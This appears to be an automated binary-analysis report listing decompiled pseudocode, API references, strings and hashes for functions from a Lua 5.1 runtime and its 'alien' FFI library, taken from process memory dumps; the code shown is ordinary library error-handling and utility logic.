alien function expected, xrefs: 00A2298F

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: free$L_argerror.lua_getfield.lua_getmetatable.lua_rawequal.lua_settop.lua_touserdata.
String ID: alien function expected$alien_function
API String ID: 84662198-489136717
Opcode ID: ca06b933a1bd98283576ad408225467570989f8caf648522469fb353a8898073
Instruction ID: b55e334c6eae0ce68119f3c771e65a6532427ec93c957a7f16f336c6cf989110
Opcode Fuzzy Hash: ca06b933a1bd98283576ad408225467570989f8caf648522469fb353a8898073
Instruction Fuzzy Hash: 84F054B2E406247BDA10D66C7E81B57736DBF80720F080835ED48A7200E635ED6187E2

Uniqueness

Uniqueness Score: -1.00%

Function 10010E30, Relevance: 10.5, APIs: 7, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10010E30(void* __eflags, intOrPtr _a4) {
				intOrPtr _t2;
				void* _t6;
				void* _t12;
				void* _t14;
				void* _t15;
				void* _t16;

				_t13 = _a4;
				_t2 = E10001840(__eflags, _a4, 0xffffd8ed);
				_t12 = E10010CE0(_t13, _t2, E10001150(_t13));
				_t15 = _t14 + 0x18;
				_t19 = _t12;
				if(_t12 < 0) {
					_t6 = E100014D0(_t19, _t13, 0xffffffff);
					_t16 = _t15 + 8;
					_t20 = _t6;
					if(_t6 != 0) {
						E1000F1C0(_t20, _t13, 1);
						E100012B0(_t20, _t13, 0xfffffffe);
						E100023C0(_t13, 2);
						_t16 = _t16 + 0x18;
					}
					E10002370(_t13);
				}
				return _t12;
			}

0x10010e31
0x10010e3c
0x10010e51
0x10010e53
0x10010e56
0x10010e58
0x10010e5d
0x10010e62
0x10010e65
0x10010e67
0x10010e6c
0x10010e74
0x10010e7c
0x10010e81
0x10010e81
0x10010e85
0x10010e8a
0x10010e91

APIs

lua_tothread.LUA5.1(?,FFFFD8ED), ref: 10010E3C
lua_gettop.LUA5.1(?,?,FFFFD8ED), ref: 10010E44

Part of subcall function 10010CE0: lua_checkstack.LUA5.1(?,?,00000000,?,?,10010C96,?,00000000,-00000001,?), ref: 10010CED
Part of subcall function 10010CE0: luaL_error.LUA5.1(?,too many arguments to resume,-00000001,?), ref: 10010D03
Part of subcall function 10010CE0: lua_status.LUA5.1(?,-00000001,?), ref: 10010D0C
Part of subcall function 10010CE0: lua_gettop.LUA5.1(?,?,-00000001,?), ref: 10010D19
Part of subcall function 10010CE0: lua_pushlstring.LUA5.1(?,cannot resume dead coroutine,0000001C,?,?,-00000001,?), ref: 10010D2D

lua_isstring.LUA5.1(?,000000FF), ref: 10010E5D

Part of subcall function 100014D0: lua_type.LUA5.1(?,?), ref: 100014DA

luaL_where.LUA5.1(?,00000001), ref: 10010E6C

Part of subcall function 1000F1C0: lua_getstack.LUA5.1(?,?,?,?), ref: 1000F1D3
Part of subcall function 1000F1C0: lua_getinfo.LUA5.1(?,10019AE8,?,?,?,?), ref: 1000F1EA
Part of subcall function 1000F1C0: lua_pushfstring.LUA5.1(?,%s:%d: ,?,?,?,?,?,?,?,?), ref: 1000F206

lua_insert.LUA5.1(?,000000FE,?,00000001), ref: 10010E74
lua_concat.LUA5.1(?,00000002,?,000000FE,?,00000001), ref: 10010E7C
lua_error.LUA5.1(?), ref: 10010E85

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_gettop.$L_error.L_where.lua_checkstack.lua_concat.lua_error.lua_getinfo.lua_getstack.lua_insert.lua_isstring.lua_pushfstring.lua_pushlstring.lua_status.lua_tothread.lua_type.
String ID:
API String ID: 3489779503-0
Opcode ID: ca32bf127a39fc309be60bf8acdb7351256d78698e24f5fbb1f8b03a2492860a
Instruction ID: 42382082a270c395690d9daea5846e4ddae6fd7980f95c5e96267412a47bfe25
Opcode Fuzzy Hash: ca32bf127a39fc309be60bf8acdb7351256d78698e24f5fbb1f8b03a2492860a
Instruction Fuzzy Hash: 47F0306E64992132E901E2296C03FDF118DCFC22F5F250225F914B72C7EE69FA4241FA

Uniqueness

Uniqueness Score: -1.00%

Function 00A21290, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00A21290(intOrPtr* __eax, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {

				_push(0x38);
				L00A23F2C();
				if(__eax == 0) {
					_push("out of memory!");
					L00A23F26();
					return 1;
				} else {
					_push("alien_function");
					_push(0xffffd8f0);
					L00A23F02();
					_push(0xfffffffe);
					L00A23F1A();
					 *((intOrPtr*)(__eax + 4)) = _a8;
					 *((intOrPtr*)(__eax + 8)) = _a12;
					 *__eax = _a4;
					 *((intOrPtr*)(__eax + 0x2c)) = 0;
					 *((intOrPtr*)(__eax + 0xc)) = 6;
					 *((intOrPtr*)(__eax + 0x30)) = 0;
					 *((intOrPtr*)(__eax + 0x34)) = 0;
					return 1;
				}
			}

0x00a21291
0x00a21294
0x00a212a0
0x00a212f4
0x00a212fa
0x00a21308
0x00a212a2
0x00a212a2
0x00a212a7
0x00a212ad
0x00a212b2
0x00a212b5
0x00a212c9
0x00a212cc
0x00a212cf
0x00a212d1
0x00a212d8
0x00a212df
0x00a212e6
0x00a212f3
0x00a212f3

APIs

lua_newuserdata.LUA5.1(?,00000038,?,00A23D3C,00000000,?,00000000), ref: 00A21294
lua_getfield.LUA5.1(?,FFFFD8F0,alien_function), ref: 00A212AD
lua_setmetatable.LUA5.1(?,000000FE,?,FFFFD8F0,alien_function), ref: 00A212B5
luaL_error.LUA5.1(?,out of memory!), ref: 00A212FA

Strings

alien_function, xrefs: 00A212A2
out of memory!, xrefs: 00A212F4

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: L_error.lua_getfield.lua_newuserdata.lua_setmetatable.
String ID: alien_function$out of memory!
API String ID: 4059151083-2139402857
Opcode ID: 5aadb1a3ef915912742623830891db9bb28b2551aaeb6971dd3a9b5372c5f379
Instruction ID: 531aba8b96b4d8f61d3e6aa241ecbde23c9401e9443bb78efe7dac851a15665c
Opcode Fuzzy Hash: 5aadb1a3ef915912742623830891db9bb28b2551aaeb6971dd3a9b5372c5f379
Instruction Fuzzy Hash: 0DF06271944721ABC7209F1CFE81B5B76E0BF85714F00893CF4995B780D779A9468F91

Uniqueness

Uniqueness Score: -1.00%

Function 100102F0, Relevance: 10.5, APIs: 7, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100102F0(void* __eflags, void* __fp0, intOrPtr _a4) {
				void* _t4;
				void* _t9;
				void* _t11;
				void* _t12;

				_t14 = __eflags;
				_t10 = _a4;
				_t9 = E1000F600(__eflags, __fp0, _a4, 2, 1);
				E10001160(_t10, 1);
				_t4 = E100014D0(_t14, _t10, 1);
				_t12 = _t11 + 0x1c;
				if(_t4 != 0) {
					_t16 = _t9;
					if(_t9 > 0) {
						E1000F1C0(_t16, _t10, _t9);
						E100013D0(_t16, _t10, 1);
						E100023C0(_t10, 2);
						_t12 = _t12 + 0x18;
					}
				}
				return E10002370(_t10);
			}

0x100102f0
0x100102f1
0x10010303
0x10010305
0x1001030d
0x10010312
0x10010317
0x10010319
0x1001031b
0x1001031f
0x10010327
0x1001032f
0x10010334
0x10010334
0x1001031b
0x10010342

APIs

luaL_optinteger.LUA5.1(?,00000002,00000001), ref: 100102FB

Part of subcall function 1000F600: lua_type.LUA5.1(?,?), ref: 1000F60C

lua_settop.LUA5.1(?,00000001,?,00000002,00000001), ref: 10010305
lua_isstring.LUA5.1(?,00000001,?,00000001,?,00000002,00000001), ref: 1001030D

Part of subcall function 100014D0: lua_type.LUA5.1(?,?), ref: 100014DA

luaL_where.LUA5.1(?,00000000), ref: 1001031F

Part of subcall function 1000F1C0: lua_getstack.LUA5.1(?,?,?,?), ref: 1000F1D3
Part of subcall function 1000F1C0: lua_getinfo.LUA5.1(?,10019AE8,?,?,?,?), ref: 1000F1EA
Part of subcall function 1000F1C0: lua_pushfstring.LUA5.1(?,%s:%d: ,?,?,?,?,?,?,?,?), ref: 1000F206

lua_pushvalue.LUA5.1(?,00000001,?,00000000), ref: 10010327
lua_concat.LUA5.1(?,00000002,?,00000001,?,00000000), ref: 1001032F
lua_error.LUA5.1(?), ref: 10010338

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_type.$L_optinteger.L_where.lua_concat.lua_error.lua_getinfo.lua_getstack.lua_isstring.lua_pushfstring.lua_pushvalue.lua_settop.
String ID:
API String ID: 3087202893-0
Opcode ID: 1002b9d1a8de4fea555f2efb8acde5e348081289fcd7044175116db7176ec545
Instruction ID: 3921290a2050ad1f47a961bc4842265e0e3746d3394452ef6287f418ba688058
Opcode Fuzzy Hash: 1002b9d1a8de4fea555f2efb8acde5e348081289fcd7044175116db7176ec545
Instruction Fuzzy Hash: 9CE0ED7E69162071F822A1252C47FDF104DDF96BD4F150015FA447A1CBEADAB78241FA

Uniqueness

Uniqueness Score: -1.00%

Function 1000FF90, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 31
stringCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E1000FF90(int* __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char* _t6;
				void* _t18;

				_t18 = __eflags;
				__imp___errno();
				_t6 = strerror( *__eax);
				_t12 = _a12;
				_t15 = _a4;
				_t8 = E100016F0(_t18, _a4, _a12, 0) + 1;
				_push(_t6);
				_push(E100016F0(_t18, _a4, _a12, 0) + 1);
				E100019F0(_t15, "cannot %s %s: %s", _a8);
				E100011B0(_t8, _t15, _t12);
				return 6;
			}

0x1000ff90
0x1000ff93
0x1000ff9c
0x1000ffa2
0x1000ffa6
0x1000ffb9
0x1000ffba
0x1000ffbb
0x1000ffc3
0x1000ffca
0x1000ffda

APIs

_errno.MSVCRT ref: 1000FF93
strerror.MSVCRT ref: 1000FF9C
lua_tolstring.LUA5.1(?,?,00000000), ref: 1000FFB0
lua_pushfstring.LUA5.1(?,cannot %s %s: %s,?,00000001,00000000,?,?,00000000), ref: 1000FFC3
lua_remove.LUA5.1(?,?,?,cannot %s %s: %s,?,00000001,00000000,?,?,00000000), ref: 1000FFCA

Strings

cannot %s %s: %s, xrefs: 1000FFBD

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: _errnolua_pushfstring.lua_remove.lua_tolstring.strerror
String ID: cannot %s %s: %s
API String ID: 3848458005-2784491881
Opcode ID: 5af78d60626d07ee9481719a982b1588427392c63b2a5bab15bbeaecd423284b
Instruction ID: bf886e3bea74faded7f9c4e64d3598e70b3128ebce94eb767c01f3b70bd84c95
Opcode Fuzzy Hash: 5af78d60626d07ee9481719a982b1588427392c63b2a5bab15bbeaecd423284b
Instruction Fuzzy Hash: 6EE092B55002107FF205DB649CC9FAB376CEFCD290F000028FA00D7202DB34AC028672

Uniqueness

Uniqueness Score: -1.00%

Function 00A21470, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E00A21470(intOrPtr _a4) {
				void* __ebx;
				void* __esi;
				void* _t3;
				void* _t7;
				char* _t8;
				intOrPtr _t9;
				void* _t10;
				void* _t11;

				_t9 = _a4;
				_t7 = E00A21110(_t3, 1, _t9, "alien_library");
				_t11 = _t10 + 4;
				if(_t7 == 0) {
					_push("alien library expected");
					_push(1);
					_push(_t9);
					L00A23F14();
					_t11 = _t11 + 0xc;
				}
				_t8 =  *(_t7 + 4);
				if(_t8 == 0) {
					_t8 = "default";
				}
				_push(_t8);
				_push("alien library %s");
				_push(_t9);
				L00A23EEA();
				return 1;
			}

0x00a21472
0x00a21486
0x00a21488
0x00a2148d
0x00a2148f
0x00a21494
0x00a21495
0x00a21496
0x00a2149b
0x00a2149b
0x00a2149e
0x00a214a3
0x00a214a5
0x00a214a5
0x00a214aa
0x00a214ab
0x00a214b0
0x00a214b1
0x00a214be

APIs

Part of subcall function 00A21110: lua_touserdata.LUA5.1(?,00000001,?,00A22DF6,alien_buffer), ref: 00A21113
Part of subcall function 00A21110: lua_getmetatable.LUA5.1(?,00000001), ref: 00A21123
Part of subcall function 00A21110: lua_getfield.LUA5.1(?,FFFFD8F0,?), ref: 00A2113A
Part of subcall function 00A21110: lua_rawequal.LUA5.1(?,000000FF,000000FE,?,FFFFD8F0,?), ref: 00A21144
Part of subcall function 00A21110: lua_settop.LUA5.1(?,000000FD), ref: 00A21153

luaL_argerror.LUA5.1(?,00000001,alien library expected), ref: 00A21496
lua_pushfstring.LUA5.1(?,alien library %s,?), ref: 00A214B1

Strings

alien library %s, xrefs: 00A214AB
alien_library, xrefs: 00A21477
default, xrefs: 00A214A5, 00A214AA
alien library expected, xrefs: 00A2148F

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: L_argerror.lua_getfield.lua_getmetatable.lua_pushfstring.lua_rawequal.lua_settop.lua_touserdata.
String ID: alien library %s$alien library expected$alien_library$default
API String ID: 259548371-1962326897
Opcode ID: 5062a97a9f6ebfe1203991ce1f76ddd9df3ab72c31fa93870003005bdc62e421
Instruction ID: e24f3375ab9f57df57396d3047cc4b8199267146cf5f8b1f61ec1dda424c11f6
Opcode Fuzzy Hash: 5062a97a9f6ebfe1203991ce1f76ddd9df3ab72c31fa93870003005bdc62e421
Instruction Fuzzy Hash: 67E0D8B3F4093077C601612C3E42E5B625DEED1770B158839F50C6B301E5B59D1642E1

Uniqueness

Uniqueness Score: -1.00%

Function 10010B10, Relevance: 10.5, APIs: 7, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10010B10(void* __ebx, void* __eflags, intOrPtr _a4) {

				_t17 = __eflags;
				_t14 = _a4;
				E1000F470(__ebx, __eflags, _a4, 2);
				E10001160(_a4, 2);
				E100012B0(_t17, _t14, 1);
				E10001AE0(_t14, 0 | E100020B0(_t14, 0, 0xffffffff, 1) == 0x00000000);
				E10001300(_t14, 1);
				return E10001150(_t14);
			}

0x10010b10
0x10010b11
0x10010b18
0x10010b20
0x10010b28
0x10010b42
0x10010b4a
0x10010b59

APIs

luaL_checkany.LUA5.1(?,00000002), ref: 10010B18

Part of subcall function 1000F470: lua_type.LUA5.1(?,?), ref: 1000F47C
Part of subcall function 1000F470: luaL_argerror.LUA5.1(?,?,value expected), ref: 1000F490

lua_settop.LUA5.1(?,00000002,?,00000002), ref: 10010B20
lua_insert.LUA5.1(?,00000001,?,00000002,?,00000002), ref: 10010B28
lua_pcall.LUA5.1(?,00000000,000000FF,00000001,?,00000001,?,00000002,?,00000002), ref: 10010B34
lua_pushboolean.LUA5.1(?,00000000,?,00000000,000000FF,00000001,?,00000001,?,00000002,?,00000002), ref: 10010B42
lua_replace.LUA5.1(?,00000001,?,00000000,?,00000000,000000FF,00000001,?,00000001,?,00000002,?,00000002), ref: 10010B4A
lua_gettop.LUA5.1(?,?,00000001,?,00000000,?,00000000,000000FF,00000001,?,00000001,?,00000002,?,00000002), ref: 10010B50

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_argerror.L_checkany.lua_gettop.lua_insert.lua_pcall.lua_pushboolean.lua_replace.lua_settop.lua_type.
String ID:
API String ID: 2393796632-0
Opcode ID: f2e9dce18f058e36f42446bc5a1685f1e8294704d20691d80c56195515566079
Instruction ID: 70eb03bfd95bf08b1b2a3843d7116d670af0df3d46f247d8c6d3f42fc91d721f
Opcode Fuzzy Hash: f2e9dce18f058e36f42446bc5a1685f1e8294704d20691d80c56195515566079
Instruction Fuzzy Hash: F0E0B639257A2131F927A2345D57FCF11498F467E0F104205F610791DADFC9368201AF

Uniqueness

Uniqueness Score: -1.00%

Function 10010970, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10010970(void* __ebx, void* __ecx, void* __eflags, intOrPtr _a4) {
				void* _t3;
				void* _t8;

				_t8 = __ecx;
				_t9 = _a4;
				E1000F470(__ebx, __eflags, _a4, 1);
				_t3 = E100016C0(__eflags, _a4, 1);
				_t15 = _t3;
				if(_t3 != 0) {
					return E10001150(_t9);
				} else {
					return E1000F230(_t9, "%s", E1000F4E0(_t8, _t15, _t9, 2, "assertion failed!", _t3));
				}
			}

0x10010970
0x10010971
0x10010978
0x10010980
0x10010988
0x1001098a
0x100109b5
0x1001098c
0x100109aa
0x100109aa

APIs

luaL_checkany.LUA5.1(?,00000001), ref: 10010978

Part of subcall function 1000F470: lua_type.LUA5.1(?,?), ref: 1000F47C
Part of subcall function 1000F470: luaL_argerror.LUA5.1(?,?,value expected), ref: 1000F490

lua_toboolean.LUA5.1(?,00000001,?,00000001), ref: 10010980
luaL_optlstring.LUA5.1(?,00000002,assertion failed!,00000000), ref: 10010995

Part of subcall function 1000F4E0: lua_type.LUA5.1(?,?,?,?,1000F27E,?,?,?,00000000), ref: 1000F4EC

luaL_error.LUA5.1(?,10019E90,00000000,?,00000002,assertion failed!,00000000), ref: 100109A1

Part of subcall function 1000F230: luaL_where.LUA5.1(?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F238
Part of subcall function 1000F230: lua_pushvfstring.LUA5.1(?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F248
Part of subcall function 1000F230: lua_concat.LUA5.1(?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F250
Part of subcall function 1000F230: lua_error.LUA5.1(?,?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F256

lua_gettop.LUA5.1(?), ref: 100109AC

Strings

assertion failed!, xrefs: 1001098D

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_type.$L_argerror.L_checkany.L_error.L_optlstring.L_where.lua_concat.lua_error.lua_gettop.lua_pushvfstring.lua_toboolean.
String ID: assertion failed!
API String ID: 3716790278-2195966079
Opcode ID: 20d845c69bdf114ce9bfb45bcbed2c24d48fe02c6ab686524bcb43155c7ba3e4
Instruction ID: 8751be9952cc2c4264dc582f14a60e6f440ce45451edf70a9ae66ed3fe5aea87
Opcode Fuzzy Hash: 20d845c69bdf114ce9bfb45bcbed2c24d48fe02c6ab686524bcb43155c7ba3e4
Instruction Fuzzy Hash: 52E0ECAE91662075F611E1287C03FEF118DCF416DCF494444FA446914BE799BAC250EB

Uniqueness

Uniqueness Score: -1.00%

Function 10011310, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10011310(void* __ebx, void* __eflags, intOrPtr _a4) {
				void* __esi;
				void* _t2;
				void* _t10;
				void* _t11;

				_t9 = _a4;
				_t2 = E10001410(__eflags, _a4, 2);
				_t11 = _t10 + 8;
				if(_t2 != 0) {
					_t15 = _t2 - 5;
					if(_t2 != 5) {
						E1000F090(__ebx, _t9, _t15, _t9, 2, "nil or table expected");
						_t11 = _t11 + 0xc;
					}
				}
				E10001160(_t9, 2);
				E10001AE0(_t9, E10001F20(_t15, _t9, 1));
				return 1;
			}

0x10011311
0x10011318
0x1001131d
0x10011322
0x10011324
0x10011327
0x10011331
0x10011336
0x10011336
0x10011327
0x1001133c
0x1001134b
0x10011359

APIs

lua_type.LUA5.1(?,00000002), ref: 10011318
luaL_argerror.LUA5.1(?,00000002,nil or table expected), ref: 10011331

Part of subcall function 1000F090: lua_getstack.LUA5.1(?,00000000), ref: 1000F0A0
Part of subcall function 1000F090: luaL_error.LUA5.1(?,bad argument #%d (%s),?,?), ref: 1000F0BC

lua_settop.LUA5.1(?,00000002), ref: 1001133C
lua_setmetatable.LUA5.1(?,00000001,?,00000002), ref: 10011344
lua_pushboolean.LUA5.1(?,00000000,?,00000001,?,00000002), ref: 1001134B

Strings

nil or table expected, xrefs: 10011329

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_argerror.L_error.lua_getstack.lua_pushboolean.lua_setmetatable.lua_settop.lua_type.
String ID: nil or table expected
API String ID: 1816645252-2873205112
Opcode ID: 8f5d50b2f73bf41c2276899261c6e6e5bf27d81391e00bddd7f63e93c9e27d28
Instruction ID: d97d09fb6170cb922df7f5a48dac2d0b1ae308061f105462952859e8ce520f37
Opcode Fuzzy Hash: 8f5d50b2f73bf41c2276899261c6e6e5bf27d81391e00bddd7f63e93c9e27d28
Instruction Fuzzy Hash: 6BE0EC6EA5662071F551A2246C43FEF214CCF167C4F454414FA14BA18FFAA9BAC242EB

Uniqueness

Uniqueness Score: -1.00%

Function 100120B0, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100120B0(void* __ecx, void* __eflags, void* __fp0, intOrPtr _a4) {
				intOrPtr* _t2;

				_t9 = _a4;
				_t2 = E1000F370(__eflags, __fp0, _a4, 1, "FILE*");
				_t3 =  *_t2;
				if( *_t2 != 0) {
					E100019F0(_t9, "file (%p)", _t3);
					return 1;
				} else {
					E10001980(__ecx, _t9, "file (closed)");
					return 1;
				}
			}

0x100120b1
0x100120bd
0x100120c2
0x100120c9
0x100120e7
0x100120f5
0x100120cb
0x100120d1
0x100120df
0x100120df

APIs

luaL_checkudata.LUA5.1(?,00000001,FILE*), ref: 100120BD

Part of subcall function 1000F370: lua_touserdata.LUA5.1(?,?), ref: 1000F37E
Part of subcall function 1000F370: lua_getmetatable.LUA5.1(?,?), ref: 1000F392
Part of subcall function 1000F370: lua_getfield.LUA5.1(?,FFFFD8F0,?), ref: 1000F3A5
Part of subcall function 1000F370: lua_rawequal.LUA5.1(?,000000FF,000000FE,?,FFFFD8F0,?), ref: 1000F3AF
Part of subcall function 1000F370: lua_settop.LUA5.1(?,000000FD), ref: 1000F3BE

lua_pushstring.LUA5.1(?,file (closed)), ref: 100120D1

Part of subcall function 10001980: lua_pushnil.LUA5.1(?), ref: 1000198D

lua_pushfstring.LUA5.1(?,file (%p),?), ref: 100120E7

Strings

file (closed), xrefs: 100120CB
FILE*, xrefs: 100120B5
file (%p), xrefs: 100120E1

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_checkudata.lua_getfield.lua_getmetatable.lua_pushfstring.lua_pushnil.lua_pushstring.lua_rawequal.lua_settop.lua_touserdata.
String ID: FILE*$file (%p)$file (closed)
API String ID: 3359669937-2131069913
Opcode ID: f642cdfc15388aa7a0fe39c10770b5c18e589e3aec163c9b167e5ae990d15817
Instruction ID: 8cad69ec44500b3f5e6c3806fd962c68d8a02a6f1acd945abe5d2ad6e3442276
Opcode Fuzzy Hash: f642cdfc15388aa7a0fe39c10770b5c18e589e3aec163c9b167e5ae990d15817
Instruction Fuzzy Hash: 93E01279A1512037E511D11C7C42FCA22D9CF472D4F054061F904AF247E77AFED656D6

Uniqueness

Uniqueness Score: -1.00%

Function 10012380, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24
stringCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E10012380(int* __eax, void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __esi;
				char* _t6;
				void* _t16;

				__imp___errno();
				_t6 = strerror( *__eax);
				_t13 = _a4;
				_push(_t6);
				E100019F0(_a4, "%s: %s", _a12);
				return E1000F090(__ebx, _t13, _t16, _t13, _a8, E100016F0(_t16, _t13, 0xffffffff, 0));
			}

0x10012381
0x1001238a
0x10012394
0x10012398
0x100123a0
0x100123bf

APIs

_errno.MSVCRT ref: 10012381
strerror.MSVCRT ref: 1001238A
lua_pushfstring.LUA5.1(?,%s: %s,?,00000000), ref: 100123A0
lua_tolstring.LUA5.1(?,000000FF,00000000,?,%s: %s,?,00000000), ref: 100123AA
luaL_argerror.LUA5.1(?,?,00000000,?,000000FF,00000000,?,%s: %s,?,00000000), ref: 100123B6

Part of subcall function 1000F090: lua_getstack.LUA5.1(?,00000000), ref: 1000F0A0
Part of subcall function 1000F090: luaL_error.LUA5.1(?,bad argument #%d (%s),?,?), ref: 1000F0BC

Strings

%s: %s, xrefs: 1001239A

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_argerror.L_error._errnolua_getstack.lua_pushfstring.lua_tolstring.strerror
String ID: %s: %s
API String ID: 2341505303-3740598653
Opcode ID: ba6f6361682199a0d5122f9b81f278c7fc564a0d207e062f2a6ba8c550e9450f
Instruction ID: 661110fb18202c3fd896f08fba9a1bf63a5b240d9f6e575e965159ac11e59620
Opcode Fuzzy Hash: ba6f6361682199a0d5122f9b81f278c7fc564a0d207e062f2a6ba8c550e9450f
Instruction Fuzzy Hash: 05E04F79408220BFE601DB649C45EAF336DEF89260F004208F914A7296DA34BD4286A6

Uniqueness

Uniqueness Score: -1.00%

Function 100160A0, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 20
COMMON

